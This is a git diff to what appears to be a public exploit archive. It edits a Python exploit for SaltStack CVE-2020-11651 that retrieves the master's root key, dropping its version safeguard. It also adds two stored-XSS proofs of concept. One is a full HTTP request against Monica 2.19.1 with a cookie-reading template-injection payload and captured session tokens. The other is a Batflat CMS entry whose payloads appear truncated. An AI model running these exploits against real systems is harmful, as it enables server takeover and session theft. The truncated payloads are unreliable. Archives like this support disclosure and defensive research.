diff --git a/exploits/multiple/remote/48421.txt b/exploits/multiple/remote/48421.txt
index 5bd051b35..6aa455263 100644
--- a/exploits/multiple/remote/48421.txt
+++ b/exploits/multiple/remote/48421.txt
@@ -48,16 +48,6 @@ def init_minion(master_ip, master_port):
# --- check funcs ----
-def check_salt_version():
- print("[+] Salt version: {}".format(salt.version.__version__))
-
- vi = salt.version.__version_info__
-
- if (vi < (2019, 2, 4) or (3000,) <= vi < (3000, 2)):
- return True
- else:
- return False
-
def check_connection(master_ip, master_port, channel):
print("[+] Checking salt-master ({}:{}) status... ".format(master_ip, master_port), end='')
sys.stdout.flush()
@@ -74,21 +64,21 @@ def check_connection(master_ip, master_port, channel):
def check_CVE_2020_11651(channel):
print("[+] Checking if vulnerable to CVE-2020-11651... ", end='')
sys.stdout.flush()
- # try to evil
+
try:
rets = channel.send({'cmd': '_prep_auth_info'}, timeout=3)
- except salt.exceptions.SaltReqTimeoutError:
- print("YES")
except:
- print("ERROR")
- raise
+ print('ERROR')
+ return None
else:
- pass
+ pass
finally:
if rets:
+ print('YES')
root_key = rets[2]['root']
return root_key
+ print('NO')
return None
def check_CVE_2020_11652_read_token(debug, channel, top_secret_file_path):
@@ -334,18 +324,11 @@ def main():
channel = init_minion(args.master_ip, args.master_port)
- if check_salt_version():
- print("[ ] This version of salt is vulnerable! Check results below")
- elif args.force:
- print("[*] This version of salt does NOT appear vulnerable. Proceeding anyway as requested.")
- else:
- sys.exit()
-
check_connection(args.master_ip, args.master_port, channel)
root_key = check_CVE_2020_11651(channel)
if root_key:
- print('\n[*] root key obtained: {}'.format(root_key))
+ print('[*] root key obtained: {}'.format(root_key))
else:
print('[-] Failed to find root key...aborting')
sys.exit(127)
diff --git a/exploits/multiple/webapps/49582.txt b/exploits/multiple/webapps/49582.txt
new file mode 100644
index 000000000..373791be2
--- /dev/null
+++ b/exploits/multiple/webapps/49582.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Monica 2.19.1 - 'last_name' Stored XSS
+# Date: 22-02-2021
+# Exploit Author: BouSalman
+# Vendor Homepage: https://www.monicahq.com/
+# Software Link: https://github.com/monicahq/monica/releases
+# Version: Monica 2.19.1
+# Tested on: Ubuntu 18.04
+# CVE : CVE-2021-27370
+
+POST /people HTTP/1.1
+Host: 192.168.99.162
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 199
+Origin: http://192.168.99.162
+Connection: close
+Referer: http://192.168.99.162/people/add
+Cookie: remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=eyJpdiI6IjZBQ21CelczS1ZxS1dmMkNxWFBqN1E9PSIsInZhbHVlIjoiME01aDNSS2FHQ1lZdS9KSVlSL1pKdC9qcHRWRDVveWFvb0ZkUFB4cFlaSDhEclB3SG9UQ3BISzVoWFdYQUYrVkdpUVNkRUNlbUxFOTEyOC9Vb1ZaWFZTblpGOWlRVW9PR0FmSVhyL3JwUmgweU9hODlJWU5vNmQ3aDcrT084MjBoQU5Ednh0TWJ6dmxwS2NadFovMEdveko1V0RvbThXT2Jram1JVW5LcXdqUzl4alVBRDFBYXNjSEt3amRxbVFvQ3pMMGJZU2owWTZzWVp1ZURTNUtoRUlJMnVrV3NiVHRNRTU5YysvLzl2Zz0iLCJtYWMiOiI5MTc2NDAwZTY4NjVmZDg3NjM1YjY3NDRiMzFhMmRiYzIwMjFhODU4YWQyOWUwZmQzOTBlY2Y1ZTI0ODdiNzVkIn0%3D; laravel_token=eyJpdiI6InIwQ2RlQW9FRG5lanlOZmlXWXBRVEE9PSIsInZhbHVlIjoiUHhPNmZneXUydGVCZHlVMEI5cHpiTWI2OE5qajN5UVJXUmJHSFV1VGgya2NEbEJ6T3N0QVhKeUZwU0R4a05HWTgwNTNidTk4aGNXc3UzejY4WDJnaUJ0VUp1ekQ5cjVDc0hLSWpGTzc1ZWRRQ05Yem0vK3RZdEpOVHNQeE4rQ1orbXNJTXhWczJnMENYeGp6Q3NnOGU5TXhpZDd1bS9wRlBZS0xsYmpLSXJiMHhSVmU2NnBUMjdYS1RTQmJrNkU4cWNtZGJVdjFpaXp5a2YzdVZsWWxQMjBicDQxUGFjZlhGbmhCOHl2MkVXdzRoalNtbE9xL010clpZMGJNVmVQNWUzQlpsRFVKamlWQ2Jydk9sZWg3cHNKWVIvRW92alp0YURJcllXa08rTjA4Y2lvVzNHTXBrem11Q21xaW92cEwiLCJtYWMiOiI1YjM5NzViODhjNTk5MWUzNWFjZDg0ZWZmNjk1NjE3MzhhN2M0NGFjNWE3MzMyMGFhNTI2ZjgxMjE4OTRjZDg4In0%3D; XSRF-TOKEN=eyJpdiI6IkZFY1FLVEJFRXJMOWh6Vll1SW51akE9PSIsInZhbHVlIjoiRTVLRFZnOEovNk9XeFB2bXFQZnFlM0FxRU9QMVRxaHRhS3RzOHNpWm45K0xXV1FsbWhzV0RxUWd6bStxVXFBTHF1WlkrSklnSXoxbkFXK1JNcURhUHp6eTFOUHdLclFkTTEvUFhtTDgzVHA2RElFNnVuOWVyRGxCSGJmdzhJOXciLCJtYWMiOiIxOWNlMjkxMjM5ZTlmMDFiZjhiM2VlZjZjZmNmMmFmZDA4MzcyZjc3Yzg2MmQ2MWIwNTY2OTZlNjQyZDkzMjA0In0%3D; laravel_session=eyJpdiI6InBtUThtUFE1RzdvbW40ay8wdWJraXc9PSIsInZhbHVlIjoiS1hoVlJoNzFrYlpBUGRTL2V0YzVDRlR6dHl6NE12NjFxVTEvbXQwYTJnRUwyY3VQc2hOeWlkbUdyeEx5aDBnYlJER1BnbW52RXR0QWs1ZG00eWg0U2JNb3dIRTQ0aU9HK0JnTzE5eXQwUGlzbDNsbVFVa3RabWVQVzF4OXJsUTMiLCJtYWMiOiI3YmQwZDFkYjAwMzdlZTllODAzYjZmNzQ2YWI5NTMzMDY0ZWIzMWIyOWI4MjM4ODMzMDdhNjc2YTE4ZDViZDg0In0%3D
+Upgrade-Insecure-Requests: 1
+
+_token=afJRD6VqgCxIze3tGcCqzyeb3YaFka3fvjqV9YOx&first_name=XSS+POC&middle_name=&last_name=%7B%7B+constructor.constructor%28%22alert%28document.cookie%29%22%29%28%29+%7D%7D&nickname=&gender=&save=true
\ No newline at end of file
diff --git a/exploits/php/webapps/49583.txt b/exploits/php/webapps/49583.txt
new file mode 100644
index 000000000..5551a32ac
--- /dev/null
+++ b/exploits/php/webapps/49583.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Batflat CMS 1.3.6 - 'multiple' Stored XSS
+# Date: 22/02/2021
+# Exploit Author: Tadjmen
+# Vendor Homepage: https://batflat.org/
+# Software Link: https://github.com/sruupl/batflat/archive/master.zip
+# Version: 1.3.6
+# Tested on: Xammpp on Windows, Firefox Newest
+# CVE : N/A
+
+Multiple Stored XSS Cross-Site Scripting on Batflat CMS 1.3.6
+
+Login with editor account with rights to Navigation, Galleries, Snippets
+
+Navigation
+- Add link
+payload: ">
+
+Galleries
+- Add gallery
+payload: mlem">